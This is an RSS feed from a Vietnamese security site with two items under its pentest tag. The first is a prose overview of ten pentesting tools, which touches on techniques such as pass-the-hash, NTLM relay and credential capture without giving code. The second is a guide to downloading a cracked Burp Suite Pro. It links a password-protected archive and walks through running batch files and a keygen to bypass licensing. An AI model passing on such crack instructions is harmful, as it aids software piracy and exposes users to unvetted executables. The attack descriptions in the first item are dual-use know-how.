<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>pentest &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/tag/pentest/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Thu, 24 Jul 2025 17:18:26 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>pentest &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>10 công cụ Pentesting mà mọi hacker đều cần</title>
		<link>https://anonyviet.com/10-cong-cu-pentesting-ma-moi-hacker-deu-can/</link>
					<comments>https://anonyviet.com/10-cong-cu-pentesting-ma-moi-hacker-deu-can/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Thu, 30 May 2024 23:34:17 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[công cụ]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentesting]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=40712</guid>

					<description><![CDATA[Các công cụ pentesting tốt nhất có thể được tìm thấy trong Pwnbox và Parrot OS. Pwnbox chạy trên cơ sở hạ tầng của Hack The Box. Bạn cũng có thể cài đặt hệ điều hành Parrot dựa trên Linux trực tiếp trên PC của mình. Khi bạn bắt đầu học cách sử dụng các [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Các công cụ pentesting tốt nhất có thể được tìm thấy trong <a href="https://help.hackthebox.com/en/articles/5185608-gs-introduction-to-pwnbox" target="_blank" rel="noopener">Pwnbox</a> và Parrot OS. Pwnbox chạy trên cơ sở hạ tầng của Hack The Box. Bạn cũng có thể cài đặt hệ điều hành Parrot dựa trên Linux trực tiếp trên PC của mình.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/JOpBSIIAADa670B9n8VOKyii2BOBgpLR-1.jpg" alt="10 công cụ Pentesting mà mọi hacker đều cần" width="878" height="495" title="10 công cụ Pentesting mà mọi hacker đều cần 2"></p>
<p>Khi bạn bắt đầu học cách sử dụng các công cụ để thực hiện pentest, thì mình sẽ liệt kê ra danh sách những công cụ mà bạn sẽ phải sử dụng thường xuyên trong quá trình pentest. Trước khi chúng ta bắt đầu, mình đã nhận được một số lời khuyên tuyệt vời từ nhà phát triển Parrot và Pwnbox, Lorenzo &#8220;Palinuro&#8221; Faletra cho những người chơi pentesters mới:</p>
<blockquote>
<p>“Khi bạn mới làm quen với Linux và bạn khám phá ra command line và các khả năng mạnh mẽ mà nó có, thì bạn sẽ muốn biết thêm về nó. Và vì bước đầu tiên là học các lệnh cơ bản, nên bước tiếp theo là biết thêm các lệnh để làm được nhiều việc hơn, nhưng thực tế lại hoàn toàn khác. Khi bạn học một vài lệnh shell để di chuyển, sao chép hoặc xóa tệp, đọc nội dung của chúng,&#8230;, bước tiếp theo không phải là tìm hiểu thêm các lệnh, mà thay vào đó là tìm hiểu cách hoạt động của Linux. Tại sao mọi thứ được coi là một tệp trong hệ thống Linux? Quyền đối với tệp hoạt động như thế nào? Pipelines là gì và làm thế nào để sử dụng chúng? Lập trình bằng Bash như thế nào?</p>
<p>Các lệnh mới sẽ được học trong khi bạn học những điều đó. Bây giờ bạn không nên tìm hiểu grep là gì hoặc tr làm gì. Nó sẽ chỉ làm lãng phí thời gian. Nhưng bạn sẽ tự nhiên biết về chúng và có thể sử dụng chúng đúng cách khi bạn tìm hiểu thêm về các pipelines UNIX. Bạn có học Regex không? Chào mừng đến với sed. Bạn có nghiên cứu về mạng Linux và cách cấu hình kết nối mạng theo cách thủ công không? Hãy tìm hiểu ifconfig, iwconfig, netstat và ip.</p>
<p>Sẽ không có ý nghĩa gì khi biết rằng chown và chmod thậm chí còn tồn tại nếu bạn không biết các quyền của Linux, và không thể không biết chúng nếu không có các nghiên cứu thích hợp. Điều tương tự cũng xảy ra với các công cụ kiểm tra thâm nhập. Tôi là người sáng lập Dự án Parrot, và hệ thống của riêng tôi chứa đầy những công cụ mà tôi chưa bao giờ sử dụng hoặc nghe nói đến. Tôi là một người kiểm tra thâm nhập và một sysadmin và tôi biết các công cụ mà tôi sử dụng tại nơi làm việc hoặc tôi đang làm việc, tất cả đều dựa trên nhu cầu và kiến ​​thức lý thuyết của tôi về lĩnh vực này.</p>
<p>Tôi biết Wireshark, Bettercap, Nmap và Metasploit vì tôi cần chúng và chúng là giải pháp hoàn hảo cho các vấn đề của tôi. Và bởi vì tôi đã gặp chúng khi tôi đang nghiên cứu về việc lập bản đồ cổng, đánh hơi và khai thác mạng. Và ngay cả khi tôi sử dụng chúng, chúng có một số tính năng mà tôi không biết (đặc biệt là Metasploit). Tôi tin rằng tôi thậm chí sẽ không thành công trong lĩnh vực an ninh mạng nếu tôi đã học về các công cụ như vậy, bởi vì chúng được liệt kê trong danh sách toàn diện nhất về các công cụ pentest. Vấn đề là, là một người mới bắt đầu, bạn không thể thực sự biết những gì cần thiết và những gì không, trừ khi bạn đã nắm vững một chủ đề. Đây là lý do tại sao xây dựng bộ kỹ năng thực hành của bạn thông qua lý thuyết luôn là chiến lược tốt nhất. Không có ‘Nmap’ nào có trong danh sách các công cụ sẽ khiến bạn trở thành vua quét cổng. Chỉ một số khóa học mạng tốt mới có.</p>
<p>Nghiên cứu lý thuyết thích hợp đằng sau một chủ đề giống như vẽ bản đồ của một vùng đất chưa biết. Sẽ dễ dàng hơn để xác định công cụ, lệnh, kỹ thuật, hack khi bạn biết chúng phù hợp với mục đích của bạn. Bạn có xu hướng tin rằng biết càng nhiều thì càng tốt, bởi vì bạn càng nhớ được tên nhiều công cụ, bạn càng cảm thấy được mình giỏi. Khi bạn phát triển và xây dựng bộ kỹ năng của mình, xu hướng ngược lại sẽ xuất hiện và khi bạn lớn tuổi hơn, bạn sẽ bắt đầu hiểu tại sao ít hơn là tốt hơn. ”</p>
</blockquote>
<h2>10 công cụ Pentesting mà mọi hacker đều cần</h2>
<h3>Firefox/Chrome</h3>
<p>Nếu bạn hỏi bất kỳ người đội đỏ (red team) có kinh nghiệm nào, họ có thể sẽ cho bạn biết việc họ thực sự sử dụng một trò khai thác là hiếm như thế nào. Hầu hết họ đều bắt đầu bằng việc sử dụng trình duyệt để thực hiện một số <a href="https://anonyviet.com/osint-la-gi-osint-duoc-su-dung-nhu-the-nao-de-truy-vet-qua-internet/">OSINT</a> để tạo danh sách tên người dùng, và sau đó cố gắng đăng nhập thủ công bằng một vài mật khẩu phổ biến như Summer2021!. Sau đó, sử dụng tài khoản này để thu thập được càng nhiều thông tin về mục tiêu càng tốt. Không chỉ các email của người dùng đó bị lộ mà người dùng đó cũng có thể có quyền truy cập vào nhiều tài nguyên đám mây như Wiki’s, Sharepoint, Confluence, Helpdesks,&#8230; Nếu không có trình duyệt web, bạn sẽ không thể truy cập tất cả các thông tin này.</p>
<p>Ngoài ra, khi nói đến việc viết báo cáo, đôi khi những kẻ lừa đảo sẽ lấy những gì họ đã làm trong các công cụ như “BurpSuite” và tạo lại cuộc tấn công trong Firefox hoặc Chrome bằng cách sử dụng “Developer Tools”. Nghe có vẻ hơi kỳ nhưng bằng cách thực hiện các cuộc tấn công mà không cần sử dụng các công cụ của bên thứ ba sẽ giúp cuộc tấn công đơn giản và thực tế hơn. Ngoài ra, nó còn cho ta biết thêm về “mối đe dọa nội bộ” và tầm quan trọng của việc ghi <a href="https://viblo.asia/p/trien-khai-bo-log-tap-trung-centralized-logging-voi-docker-va-kubernettes-cho-server-su-dung-elk-stack-maGK7OdMKj2" target="_blank" rel="noopener">nhật ký tập trung</a>.</p>
<h3>Metasploit</h3>
<p><a href="https://anonyviet.com/cach-su-dung-metasploit-de-tan-cong-mang-co-ban-nhat/">Metasploit</a> Framework là một nền tảng pentesting mạng, được phát triển bởi Rapid7. Hiện nó là một trong những ứng dụng pentesting mạng phổ biến nhất. Với phần mềm này, bạn có thể kiểm tra các mạng để xem việc khai thác cụ thể có thành công hay không. Những người pentesting mạng cần biết liệu các mạng có dễ bị tấn công bởi các hành vi khai thác phổ biến hay không. Hiện có một số lượng lớn các công cụ khai thác trong bộ sưu tập của Metasploit, với các công cụ mới được thêm vào thường xuyên.</p>
<p>Một số tính năng phổ biến nhất của Metasploit:</p>
<ul>
<li>Một số lượng lớn công cụ khai thác</li>
<li>Payloads nâng cao</li>
<li>Chức năng phụ trợ</li>
<li>Bộ mã hóa</li>
<li>Listeners</li>
<li>Mô-đun khai thác giao thức Post</li>
<li>Shellcodes</li>
</ul>
<p>Có một câu thần chú tiêu cực chống lại việc sử dụng Metasploit, vì nó có thể khiến mọi thứ trở nên quá dễ dàng. Tuy nhiên, vì đây là một dự án lớn nên mỗi mô-đun khai thác phải thực hiện nhiều thử nghiệm hơn để đảm bảo nó đáng tin cậy. Trong Dante, có một máy chủ dễ bị tấn công bởi Eternal Blue, nhiều người sử dụng tập lệnh python trên github để khai thác nó, điều này khiến họ nhận được một shell nhưng cũng có khả năng cao bị lỗi dịch vụ, điều này sẽ gây thiệt hại trong môi trường chuyên nghiệp. Mô-đun Metasploit rất hiếm khi xảy ra sự cố dịch vụ.</p>
<h3>Bettercap</h3>
<p>Nếu bạn đang pentesting các mạng không dây, chẳng hạn như WiFi, Bluetooth hoặc thiết bị HID không dây, Bettercap là một công cụ rất hữu ích.</p>
<p>Bettercap được phát triển bởi một người đàn ông theo Evilsocket. Dưới đây là một số tính năng tốt nhất của Bettercap:</p>
<ul>
<li>Quét cổng siêu nhanh</li>
<li>Mô phỏng các cuộc tấn công man-in-the-middle trên các mạng không dây để thu thập thông tin xác thực và <a href="https://viblo.asia/p/tim-hieu-ve-fuzz-testing-YWOZrDzv5Q0" target="_blank" rel="noopener">fuzzing giao thức mạng</a></li>
<li>ARP, DHCPv6, NDP và giả mạo DNS để tạo điều kiện cho các cuộc tấn công trung gian</li>
<li>Quét mạng WiFi với chụp handshake WPA/WPA2</li>
<li>Hỗ trợ API REST</li>
<li>MouseJacking thông qua công nghệ HID</li>
<li>Thăm dò và trinh sát máy chủ lưu trữ mạng IP thụ động và chủ động</li>
</ul>
<p>Rất nhiều thiết bị có thể được kiểm tra với Bettercap, chẳng hạn như routers không dây, thiết bị đầu vào không dây như chuột và bàn phím, thiết bị và mạng Bluetooth.</p>
<h3>Burp Suite</h3>
<p>Burp Suite được phát triển bởi PortSwigger. Đây là một công cụ dựa trên proxy được sử dụng để đánh giá tính bảo mật của các ứng dụng dựa trên web. Các phiên bản trả phí có nhiều tính năng hơn, nhưng phiên bản Cộng đồng đã có một số tính năng khá mạnh mẽ, bao gồm:</p>
<ul>
<li>Bản demo của Burp Intruder (để tự động hóa các cuộc tấn công tùy chỉnh chống lại các ứng dụng web)</li>
<li>Lịch sử và proxy HTTP, HTTPS và WebSockets</li>
<li>Bộ lặp, bộ giải mã, bộ tuần tự và bộ so sánh</li>
</ul>
<p>Làm quen với các ứng dụng của Burp Suite sẽ giúp bạn trong hành trình pentesting web của mình.</p>
<h3>Nmap</h3>
<p>Nmap là công cụ phổ biến nhất trong danh sách này. Tên của nó chỉ đơn giản có nghĩa là &#8220;network mapper&#8221; và đó là những gì nó làm. Với Nmap, bạn có thể khám phá đầy đủ cơ sở hạ tầng mạng, máy chủ, điểm cuối và cách mọi thứ được kết nối. Đó là thông tin cần thiết nếu bạn định pentest mạng. Ngay cả các quản trị viên mạng cũng sử dụng Nmap để kiểm kê mạng của chính họ, đây thường là một nhiệm vụ khó khăn.</p>
<p>Dưới đây là một số tính năng đáng chú ý nhất của Nmap:</p>
<ul>
<li>Quét mạng từ mạng LAN nhỏ với một vài thiết bị đến các mạng lớn với hàng trăm nghìn thiết bị</li>
<li>Nmap có thể được vận hành từ dòng lệnh hoặc GUI theo sở thích cá nhân của bạn</li>
<li>Vì Nmap rất phổ biến nên có nhiều tài liệu hướng dẫn về nó</li>
<li>Thiết bị mạng fingerprint cho máy chủ, dịch vụ và hệ điều hành</li>
<li>Khám phá các loại tường lửa và lọc gói mà mạng có</li>
</ul>
<p>Tất cả các pentesters mạng đều phải sử dụng Nmap. Bạn có thể xem qua khóa học <a href="https://academy.hackthebox.com/course/preview/network-enumeration-with-nmap" target="_blank" rel="noopener">Enumeration Network với Nmap</a> để tìm hiểu cách thực sự thành thạo nó.</p>
<h3>Wireshark</h3>
<p>Wireshark là một trình phân tích gói. Thông thường, pentesters sẽ chuyển đổi qua lại giữa Nmap và Wireshark. Nmap để xem mạng, sau đó Wireshark để xem dữ liệu trong mạng. Nhưng chúng là các ứng dụng hoàn toàn riêng biệt và Wireshark chắc chắn có thể được sử dụng riêng nếu bạn không cần thực hiện bất kỳ ánh xạ (mapping ) mạng nào cho một tác vụ cụ thể.</p>
<p>Tất cả dữ liệu được gửi qua mạng đều được gửi dưới dạng gói TCP hoặc UDP. Nếu các gói này không được mã hóa theo một cách nào đó hoặc nếu mã hóa bị bẻ khóa hoặc bị bypass, thì việc phân tích gói sẽ rất dễ dàng. Nhưng Wireshark cũng có khả năng giải mã mạng nếu bạn đang thử nghiệm các mạng được mã hóa. Dưới đây là một số tính năng của nó:</p>
<ul>
<li>Chụp gói (pcap)</li>
<li>Cả chụp trực tiếp và phân tích ngoại tuyến</li>
<li>Sử dụng GUI hoặc TShark để duyệt dữ liệu mạng đã chụp</li>
<li>Kiểm tra sâu hàng trăm giao thức</li>
<li>Hỗ trợ giải mã cho IPsec, ISAKMP, Kerberos, SNMPv3, SSL / TLS, WEP và WPA / WPA2</li>
</ul>
<h3>Hashcat</h3>
<p>Hashcat là một công cụ khôi phục mật khẩu mạnh mẽ. Nó có thể sớm trở thành công cụ yêu thích của bạn để bẻ khóa nhiều loại mật khẩu và được phát triển bởi Jens &#8216;atom&#8217; Steube và &#8216;matrix&#8217; Gabriele Gristina. Dưới đây là một số tính năng của nó:</p>
<ul>
<li>Tấn công Brute force, tổ hợp, từ điển và mật khẩu dựa trên quy tắc</li>
<li>Crack nhiều mã băm đồng thời</li>
<li>Hỗ trợ phiên</li>
<li>Hỗ trợ mạng bẻ khóa phân tán</li>
<li>Hỗ trợ hex-salt và hex-charset</li>
<li>Hoạt động với hơn 350 kiểu băm</li>
<li>Tạm dừng và tiếp tục bẻ khóa mật khẩu bất cứ khi nào bạn cần</li>
</ul>
<p>Bẻ khoá mật khẩu là công việc đòi hỏi nhiều sức mạnh của CPU, nhưng Hashcat hoàn thành tốt nhiệm vụ này. Bạn có thể xem khóa học <a href="https://academy.hackthebox.com/course/preview/cracking-passwords-with-hashcat" target="_blank" rel="noopener">Cracking mật khẩu với Hashcat</a> của HTB nếu bạn muốn thực sự thành thạo công cụ mạnh mẽ này.</p>
<h3>Impacket</h3>
<p>Linux thường là hệ điều hành được lựa chọn để kiểm tra thâm nhập. Ngoài ra, Linux không tương thích với nhiều giao thức được sử dụng trong Môi trường Windows. Đó là lý do impacket xuất hiện vì nó là một thư viện python cho phép tin tặc sử dụng các giao thức này theo cách mà chúng muốn. Ví dụ, một trong những cuộc tấn công lâu đời nhất trên Windows là cuộc tấn công “Pass The Hash”, cho phép kẻ tấn công xác thực bằng mã băm mật khẩu thay vì mật khẩu thực. Windows không có giao diện người dùng để thực hiện loại xác thực này, tuy nhiên, vì impacket chỉ là một thư viện python nên tin tặc đã khai thác phương thức xác thực này.</p>
<p>Một số công cụ impacket phổ biến nhất:</p>
<ul>
<li>psexec: Đây là một bản sao của Gói Sysinternals PSExec và cung cấp một cách xác thực dựa trên remote windows và lấy lại command prompt.</li>
<li>wmiexec: Giống như psexec nhưng thay vì sử dụng phương pháp mà psexec thực hiện (thả một tệp vào đĩa, sau đó tạo một dịch vụ để thực thi nó), nó sẽ sử dụng WMI để chạy các lệnh trực tiếp trên máy. PSexec thường bị phần mềm chống virus quét nhưng WMI không &#8220;đụng vào ổ đĩa&#8221;, vì vậy nhiều AV sẽ bỏ qua nó.</li>
<li>secretdump: Bạn có thông tin đăng nhập quản trị viên domain ? Công cụ này sẽ loại bỏ mọi mật khẩu ra khỏi Active Directory!</li>
<li>GetNPUsers: Bạn đã bao giờ nghe về Kerberoasting? Nếu người dùng có thuộc tính Active Directory: “Do not require Kerberos preauthentication”. Thao tác này sẽ trích xuất một hàm băm mật khẩu mà mọi người có thể bẻ khóa bằng Hashcat.</li>
<li>ntlmrelayx: Công cụ này cho phép người dùng thực hiện các cuộc tấn công NTLM Relay chống lại các máy chủ chưa bật SMB Signing. Về cơ bản, người dùng buộc một máy chủ có “đặc quyền cao” như Domain Controller kết nối lại (PetitPotam, Máy in,&#8230;), sau đó chuyển tiếp kết nối đó đến một máy trạm khác và tham gia vào phiên làm việc.</li>
</ul>
<p>Tất cả các công cụ trên đều hoạt động tuyệt vời. Tuy nhiên, như mình đã nói trước đó Impacket là một thư viện python và các hacker có kinh nghiệm luôn chỉnh sửa nó để làm được nhiều việc hơn.</p>
<h3>BloodHound</h3>
<p>Nếu bạn đang pentesting các mạng Windows, hãy dùng thử BloodHound. Các mạng có máy chủ và máy khách Windows sử dụng Active Directory để quản trị và đó là những gì BloodHound tập trung vào. Vì vậy, công cụ này sẽ giúp ích rất nhiều nếu bạn cần thâm nhập đúng vào mạng Windows thông qua Active Directory.</p>
<p>Dưới đây là những gì Bloodhound có thể làm:</p>
<ul>
<li>Khám phá kỹ lưỡng các ACL (danh sách kiểm soát truy cập), được Active Directory sử dụng để quản lý các đặc quyền của tài khoản người dùng</li>
<li>Nhận thông tin cấu hình Active Directory có thể giúp báo cáo đặc quyền</li>
<li>Xuất ra thông tin trực quan của mạng với Active Directory để khám phá các mối quan hệ, kết nối và quản trị viên domain Active Directory</li>
</ul>
<p>Các mạng Windows có Active Directory rất phổ biến, vì vậy Bloodhood là một công cụ rất hữu ích để kiểm tra tính bảo mật của chúng. Và nếu bạn thực sự muốn khai thác tối đa BloodHound, hãy xem khóa học <a href="https://academy.hackthebox.com/course/preview/active-directory-bloodhound" target="_blank" rel="noopener">Active Directory BloodHound</a>.</p>
<h3>Responder</h3>
<p>Cuối cùng nhưng không kém phần quan trọng, một trong những công cụ được sử dụng nhiều nhất cho các cuộc tấn công liên quan đến Link Local Multicast Name Resolution (LLMNR), NBT-NS và đầu độc MDNS có thể được sử dụng trong mọi hoạt động thử nghiệm thâm nhập cơ sở hạ tầng là công cụ Responder. Nó vẫn được người sáng tạo Laurent Gaffie tích cực duy trì và được coi là một trong những phương pháp dễ dàng nhất để Red Team có được thông tin đăng nhập cả ở dạng văn bản thuần hoặc được băm bằng mật khẩu và có thể là một trong những cách nhanh nhất để truy cập quản trị viên Domain. Responder mô phỏng các dịch vụ khác nhau và cung cấp chúng cho mạng khiến máy Windows cố gắng giao tiếp nhầm với các máy chủ giả mạo để làm lộ mật khẩu được băm hợp lệ. Nó cũng có thể chụp các thông tin xác thực và do đó có thể nắm bắt chúng ở định dạng văn bản thuần hoặc trong nhiều trường hợp tự động sử dụng mật khẩu băm theo kiểu tấn công pass-the-hash để đăng nhập vào các hệ thống hợp pháp.</p>
<p>Một số tính năng tốt nhất của nó bao gồm:</p>
<ul>
<li>Máy chủ xác thực tích hợp như SMB, MSSQL, HTTP / HTTPS, LDAP, FTP, POP3, v.v.</li>
<li>Chuyển hướng Icmp</li>
<li>Lỗi DHCP</li>
<li>Chế độ phân tích</li>
<li>Lấy dấu vân tay</li>
<li>Trình nghe trình duyệt</li>
</ul>
<p>Ngoài ra, bạn cũng có thể xem lộ trình để trở thành pentester Website <a href="https://anonyviet.com/lo-trinh-tro-thanh-nha-kiem-thu-tham-nhap-website/">tại đây</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Pwnbox và Parrot OS là gì và tại sao chúng lại hữu ích trong pentesting?</h3>
<p>Pwnbox là một môi trường pentesting dựa trên nền tảng Hack The Box, cung cấp các công cụ sẵn sàng sử dụng. Parrot OS là một hệ điều hành Linux được thiết kế đặc biệt cho pentesting, cho phép bạn cài đặt và quản lý các công cụ một cách hiệu quả trên máy tính cá nhân.</p>
<h3>Tôi nên bắt đầu học pentesting bằng cách nào?</h3>
<p>Tập trung vào việc hiểu các nguyên lý cơ bản của hệ thống Linux và mạng máy tính trước khi tìm hiểu các công cụ cụ thể.  Xây dựng nền tảng lý thuyết vững chắc sẽ giúp bạn sử dụng các công cụ một cách hiệu quả và chính xác hơn.</p>
<h3>Metasploit có thực sự cần thiết cho người mới bắt đầu học pentesting không?</h3>
<p>Mặc dù Metasploit là một công cụ mạnh mẽ, nhưng việc hiểu rõ các nguyên lý hoạt động của nó đòi hỏi kiến thức nền tảng vững chắc.  Tập trung vào việc học các khái niệm cơ bản trước khi sử dụng các công cụ phức tạp như Metasploit sẽ giúp bạn có được kết quả tốt hơn.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/10-cong-cu-pentesting-ma-moi-hacker-deu-can/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Download Burp Suite 2024 Pro Full Key &#8211; Cách Active bản quyền</title>
		<link>https://anonyviet.com/download-burp-suite-2024-full/</link>
					<comments>https://anonyviet.com/download-burp-suite-2024-full/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 04 Nov 2022 14:00:03 +0000</pubDate>
				<category><![CDATA[Phần mềm máy tính]]></category>
		<category><![CDATA[Burp Suite]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[tool hack]]></category>
		<category><![CDATA[Website]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=16211</guid>

					<description><![CDATA[Burp Suite là gì? Burp Suite 2022.11 Pro Full (viết tắt là Burp) là công cụ tích hợp nổi tiếng và phổ biến, được sử dụng để thực hiện các bài kiểm tra thâm nhập bảo mật cho các ứng dụng web. Thực ra nó được sử dụng phổ biến hơn cho các hoạt động [&#8230;]]]></description>
										<content:encoded><![CDATA[<h2>Burp Suite là gì?</h2>
<p><strong>Burp Suite 2022.11 Pro Full</strong> (viết tắt là Burp) là công cụ tích hợp nổi tiếng và phổ biến, được sử dụng để thực hiện các bài kiểm tra thâm nhập bảo mật cho các ứng dụng web. Thực ra nó được sử dụng phổ biến hơn cho các hoạt động <a href="https://anonyviet.com/?s=hack+website">hack Website</a>. Phần mềm được viết bằng Java, được phát triển bởi PortSwigger từ Anh.</p>
<p><strong>Burp Suite 2022.11 Pro Full Key</strong> cung cấp cho bạn một phương tiện đơn giản để thực hiện kiểm tra bảo mật Website. Nó cung cấp cho bạn toàn quyền kiểm soát, cho phép bạn kết hợp các kỹ thuật thủ công nâng cao phối hợp với nhiều công cụ kiểm thử khác cho quá trình kiểm thử.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/11/Burp-Suite-Pro-Full.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2019/11/Burp-Suite-Pro-Full.jpg" alt="Download Burp Suite Pro Full Key" width="750" height="525" title="Download Burp Suite 2024 Pro Full Key - Cách Active bản quyền 9"></a></p>
<p><strong>Burp Suite 2012.12 Crack</strong> bao gồm một số công cụ để tấn công mạng và nhiều giao diện đã được thiết kế cho các công cụ này, nhằm tạo điều kiện và tăng tốc quá trình tấn công các ứng dụng. Công cụ giúp phân tích các thông tin của: HTTP messages, persistence, certification, proxy, log, alert,, v.v. Các chức năng đa dạng của nó có thể giúp chúng ta thực hiện các tác vụ khác nhau, bao gồm chặn và sửa đổi các yêu cầu mạng, quét lỗ hổng của các ứng dụng web, bẻ khóa đăng nhập với brute force, session, token và kiểm tra ngẫu nhiên khác.</p>
<p>Tóm lại, là một trong những công cụ tốt nhất để kiểm tra bảo mật Website. Burp Suite hơi khó sử dụng, đặc biệt là với các tham số phức tạp của nó. Nhưng một khi bạn hiểu rõ về cách sử dụng của nó, đây sẽ là công cụ đắc lực cho Hacker.</p>
<h3>Các tính năng</h3>
<table style="border-collapse: collapse; width: 99.806%;">
<tbody>
<tr>
<td style="width: 14.8%;">Tính năng</td>
<td style="width: 85.0667%;">Mô tả</td>
</tr>
<tr>
<td style="width: 14.8%;">HTTP Proxy</td>
<td style="width: 85.0667%;"> Hoạt động như một máy chủ proxy web và nằm ở vị trí trung gian giữa trình duyệt và máy chủ web đích. Cho phép đánh chặn, kiểm tra và sửa đổi lưu lượng dữ liệu đi qua từ hai hướng.</td>
</tr>
<tr>
<td style="width: 14.8%;">Scanner</td>
<td style="width: 85.0667%;">Một trình quét bảo mật ứng dụng web. Được sử dụng để thực hiện quét lỗ hổng của các ứng dụng web.</td>
</tr>
<tr>
<td style="width: 14.8%;">Intruder</td>
<td style="width: 85.0667%;">Công cụ này có thể thực hiện các cuộc tấn công tự động vào các ứng dụng web. Công cụ này cung cấp một thuật toán có thể định cấu hình có thể tạo các yêu cầu HTTP độc hại. Công cụ xâm nhập có thể kiểm tra và phát hiện các SQL Injection,  Cross Site Scripting, thao tác tham số và các lỗ hổng dễ bị tấn công bằng brute-force.</td>
</tr>
<tr>
<td style="width: 14.8%;">Spider</td>
<td style="width: 85.0667%;">Công cụ để tự động thu thập các ứng dụng web. Nó có thể được sử dụng cùng với các kỹ thuật mapping thủ công để tăng tốc quá trình mapping nội dung và chức năng của ứng dụng.</td>
</tr>
<tr>
<td style="width: 14.8%;">Repeater</td>
<td style="width: 85.0667%;">Công cụ đơn giản có thể được sử dụng để kiểm tra thủ công một ứng dụng. Nó có thể được sử dụng để sửa đổi các yêu cầu đến máy chủ, gửi lại chúng và quan sát kết quả.</td>
</tr>
<tr>
<td style="width: 14.8%;">Decoder</td>
<td style="width: 85.0667%;">Công cụ để chuyển đổi dữ liệu được mã hóa thành dạng chính tắc của nó hoặc để chuyển đổi dữ liệu thô thành các dạng được mã hóa và băm khác nhau. Nó có khả năng nhận biết một cách thông minh một số định dạng mã hóa bằng các kỹ thuật heuristic.</td>
</tr>
<tr>
<td style="width: 14.8%;">Comparer</td>
<td style="width: 85.0667%;">Thực hiện so sánh (một hình ảnh khác biệt trực quan) giữa hai mục dữ liệu bất kỳ.</td>
</tr>
<tr>
<td style="width: 14.8%;">Extender</td>
<td style="width: 85.0667%;">Cho phép trình kiểm tra bảo mật tải các tiện ích mở rộng Burp, để mở rộng chức năng của Burp bằng cách sử dụng mã của bên kiểm tra bảo mật hoặc bên thứ ba (BAppStore)</td>
</tr>
<tr>
<td style="width: 14.8%;">Sequencer</td>
<td style="width: 85.0667%;">Phân tích ngẫu nhiên mẫu dữ liệu được gửi đi. Nó có thể được sử dụng để kiểm tra session của ứng dụng không thể đoán trước, chẳng hạn như anti-CSRF tokens, thông báo đặt lại mật khẩu, v.v.</td>
</tr>
</tbody>
</table>
<h2>Cách cài đặt và Active Burp Suite 2022.11 Pro Full Key</h2>
<p>Do Burp Suite 2022.11 Pro <strong>chạy trên nền Java</strong>, nên bạn cần cài Java trước, tải trọn bộ cài đặt ở Link bên dưới:</p>
<p style="text-align: center;"><a href="https://www.fshare.vn/file/I9DVZ21O2XAB" target="_blank" rel="noopener"><span style="text-decoration: underline;"><strong><span style="font-size: 14pt;">Download Burp Suite 2022.11 Pro Full Key</span></strong></span></a></p>
<p style="text-align: center;"><span style="color: #3366ff;"><strong>(Password: anonyviet.com)</strong></span></p>
<p><strong>Bước 1:</strong> Cài <a href="https://www.fshare.vn/file/SIS7CW6VL5LC" target="_blank" rel="noopener">JAVA</a> trên Windows</p>
<p><strong>Bước 2: </strong>Chạy File reset_license.bat nếu trên máy tính đã cài Burp Suite rồi.</p>
<p><strong>Bước 3: </strong>Chạy File step1.bat, sau đó <strong>uncheck</strong> &#8220;help improve burp by &#8230;&#8221; và chọn &#8220;I Accept&#8221;</p>
<p><strong>Bước 4: </strong>Chạy File step2.bat</p>
<p><strong>Bước 5:</strong> nhấn <strong>RUN</strong> để mở Burp</p>
<p><strong>Bước 6:</strong> Copy License -&gt; Next -&gt; Copy Code qua lại BurpLoaderKeygen để Get Key, Copy Key qua lại để Active</p>
<p><strong>Bước 7:</strong> burpsuite_pro_v2022.11 để Active Key (chi tiết xem hình bên dưới)</p>
<p>&nbsp;</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/11/2-enter-license-key-burp-suite.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2019/11/2-enter-license-key-burp-suite.jpg" alt="active burp suite License Text" width="941" height="336" title="Download Burp Suite 2024 Pro Full Key - Cách Active bản quyền 10"></a></p>
<p>Chọn <strong>Manual activation</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/11/3-manual-activation.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2019/11/3-manual-activation.jpg" alt="Manual activation burp suite" width="386" height="317" title="Download Burp Suite 2024 Pro Full Key - Cách Active bản quyền 11"></a></p>
